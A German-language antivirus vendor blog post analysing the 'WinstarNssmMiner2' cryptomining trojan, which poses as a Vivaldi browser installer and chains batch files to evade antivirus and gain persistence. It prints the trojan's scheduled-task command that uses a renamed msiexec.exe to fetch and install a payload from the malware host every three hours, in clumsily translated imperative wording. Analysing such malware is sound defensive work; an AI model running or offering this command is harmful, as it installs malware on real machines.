Über 200.000 Computer wurden bereits mit dem CryptoMiner „WinstarNssmMiner2“ infiziert.

Juni 13, 2018360TS
Mehr Infos zum 360 Total Security

Das 360 Security Center erkannte einen CryptoMiner Trojaner, der sich derzeit aktiv ausbreitet. Der Trojaner präsentiert sich als normales Dienstprogramm, z. B. als Browser Vivaldi, und dringt über Software-Installationsprogramme auf Geräte ein. Wir raten dringend, Software nur über offizielle Quellen (nicht über unbekannte Quellen) herunterzuladen. Wir haben diesem Trojaner den Namen „WinstarNssmMiner2“ gegeben, da er dasselbe Verhalten wie „WinstarNssmMiner“ zeigt.

Analyse

Der gefälschte Browser wurde im MSI-Format entwickelt und enthält mehrere Batch-Dateien, verschlüsselte zip-Dateien und ein Extrahierungstool.

1. Der Trojaner führt u.bat aus, um das Extrahierungstool zu starten, die zip-Dateien mit dem Password „x12“ zu extrahieren und zudem ein nircmd-Programm zu extrahieren.

2. Führen Sie c.bat aus und überprüfen Sie, ob eine Antivirus-Software wie Kaspersky, ESET oder DrWeb installiert ist. Falls eine Antivirus-Software vorhanden ist, unterbricht diese den Vorgang von msiexec.exe und entfernt Trojanerdateien.

3. Führen Sie nir.bat aus, um nircmd und i.bat zu starten und Administratorrechte zu gewähren.

4. Führen Sie i.bat aus, um eine Planaufgabe hinzuzufügen. Der Trojaner kopiert die Systemdatei „msiexec.exe“ und gibt ihr einen zufälligen Dateinamen mit der Endung „.exe“. Der Inhalt der Aufgabe wird mit einer URL in Kombination mit dem Domainnamen „makerstat.info“ gefüllt. Der Trojaner verhindert über die Dateidownload-Funktion von MSI, das er von einem Antivirusprogramm erkannt wird.

Führen Sie den nachstehenden Befehl in der Befehlszeile aus:
schtasks /create /tn „TEST-xxx“ /tr „‚C:\WINDOWS\System32\3164326753.exe‘ /i http://makerstat.info/26753.rar /q“ /sc minute /mo 180 /rl highest /f

3164326753.exe ist die umbenannte Datei von msiexec.exe
Der Inhalt der erstellten Planaufgabe lautet:

Derzeit kann die URL nicht abgerufen werden. Sie wirkt wie ein unbrauchbares Startobjekt, ist jedoch eine Update-Quelle für den Trojaner. Sobald die URL online ist, führt die Planaufgabe den Trojaner aus, um die URL alle drei Stunden aufzurufen. Dieser MSI Trojaner verhält sich mit WinsarNssmMiner genauso, wie wir zuvor analysiert haben.

Installieren Sie nun den Browser Vivaldi.

Zum aktuellen Zeitpunkt können nur wenige Antivirus-Programme, darunter 360 Total Security, diesen Trojaner erkennen.

Erinnerung

In letzter Zeit haben wir festgestellt, dass sich viele CryptoMiner-Trojaner in freier Wildbahn ausbreiten. Wir empfehlen Anwendern dringend, bei der Installation neuer Anwendungen Antivirus-Software einzusetzen. Anwendern wird auch empfohlen, gemeinsam mit 360 Total Security einen Virenscanner laufen zu lassen, um nicht zum CryptoMiner-Opfer zu werden.

Mehr Infos zum 360 Total Security